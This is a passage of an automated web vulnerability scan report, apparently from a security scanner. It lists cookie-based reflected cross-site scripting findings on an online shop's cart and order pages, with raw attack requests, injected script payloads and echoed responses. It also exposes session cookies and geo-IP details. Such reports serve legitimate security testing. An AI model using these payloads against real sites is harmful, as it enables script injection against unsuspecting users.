User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cart=Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; SessionId=1310349220110417085445173193214243; SRCCODE=CAWEB; beta=Y; SRVR=WEBX140%2D01C; DB=msRandX=93&msProduct=1782427&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954e5fe4--><script>alert(1)</script>4f7d177caa6; __utmb=36441954.1.10.1303044886

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 12:59:00 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:59:01 GMT
Connection: close
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Content-Length: 15773

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--__utmc :36441954e5fe4--><script>alert(1)</script>4f7d177caa6-->
...[SNIP]...

4.315. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utmz cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the __utmz cookie is copied into an HTML comment. The payload 8864b--><script>alert(1)</script>db873c5a861 was submitted in the __utmz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp?msg= HTTP/1.1
Host: shop.ca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cart=Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; SessionId=1310349220110417085445173193214243; SRCCODE=CAWEB; beta=Y; SRVR=WEBX140%2D01C; DB=msRandX=93&msProduct=1782427&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)8864b--><script>alert(1)</script>db873c5a861; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.1.10.1303044886

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 12:58:58 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:58:59 GMT
Connection: close
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Content-Length: 15773

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--__utmz(36441954.1303:(direct)|utmccn=(direct)|utmcmd=(none)8864b--><script>alert(1)</script>db873c5a861-->
...[SNIP]...

4.316. http://shop.ca.com/cgi-bin/ShoppingCart.asp [_clogin cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the _clogin cookie is copied into an HTML comment. The payload 1646a--><script>alert(1)</script>db9335b70ec was submitted in the _clogin cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=13030469394521646a--><script>alert(1)</script>db9335b70ec;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:42 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:42 GMT
Content-Length: 16117
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--_clogin(e) :13030469394521646a--><script>alert(1)</script>db9335b70ec-->
...[SNIP]...

4.317. http://shop.ca.com/cgi-bin/order.asp [Cart cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the Cart cookie is copied into an HTML comment. The payload 3d1cc--><script>alert(1)</script>fb799069361 was submitted in the Cart cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp3d1cc--><script>alert(1)</script>fb799069361; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Length: 16117
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:44 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:45 GMT
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp3d1cc%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efb799069361&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--Cart(Landing) :http://shop.ca.com/ca/resources/resources.asp3d1cc--><script>alert(1)</script>fb799069361-->
...[SNIP]...

4.318. http://shop.ca.com/cgi-bin/order.asp [CoreID6 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the CoreID6 cookie is copied into an HTML comment. The payload 6b280--><script>alert(1)</script>41767fe1d77 was submitted in the CoreID6 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=6b280--><script>alert(1)</script>41767fe1d77; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:46 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:46 GMT
Content-Length: 16117
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--CoreID6(818720507435:6b280--><script>alert(1)</script>41767fe1d77-->
...[SNIP]...

4.319. http://shop.ca.com/cgi-bin/order.asp [DB cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the DB cookie is copied into an HTML comment. The payload 28157--><script>alert(1)</script>38e08d480c7 was submitted in the DB cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=9328157--><script>alert(1)</script>38e08d480c7; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:44 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:44 GMT
Content-Length: 16117
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--DB(msRandX) :9328157--><script>alert(1)</script>38e08d480c7-->
...[SNIP]...

4.320. http://shop.ca.com/cgi-bin/order.asp [IS3_GSV cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the IS3_GSV cookie is copied into an HTML comment. The payload 245fd--><script>alert(1)</script>607b373e6c1 was submitted in the IS3_GSV cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com245fd--><script>alert(1)</script>607b373e6c1; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:48 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:49 GMT
Content-Length: 16117
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--IS3_GSV :DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com245fd--><script>alert(1)</script>607b373e6c1-->
...[SNIP]...

4.321. http://shop.ca.com/cgi-bin/order.asp [IS3_History cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the IS3_History cookie is copied into an HTML comment. The payload 60794--><script>alert(1)</script>59cf425ed97 was submitted in the IS3_History cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_060794--><script>alert(1)</script>59cf425ed97; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:48 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:48 GMT
Content-Length: 16117
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--IS3_History :1301114230-2-91_0--2__0_060794--><script>alert(1)</script>59cf425ed97-->
...[SNIP]...

4.322. http://shop.ca.com/cgi-bin/order.asp [SessionId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the SessionId cookie is copied into an HTML comment. The payload 2093c--><script>alert(1)</script>bc9b73c274d was submitted in the SessionId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=13103492201104170854451731932142432093c--><script>alert(1)</script>bc9b73c274d; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:42 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:42 GMT
Content-Length: 16117
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--SessionId :13103492201104170854451731932142432093c--><script>alert(1)</script>bc9b73c274d-->
...[SNIP]...

4.323. http://shop.ca.com/cgi-bin/order.asp [__utma cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the __utma cookie is copied into an HTML comment. The payload 3c513--><script>alert(1)</script>9351f2fd952 was submitted in the __utma cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.13c513--><script>alert(1)</script>9351f2fd952; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:50 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:50 GMT
Content-Length: 16117
Connection: close
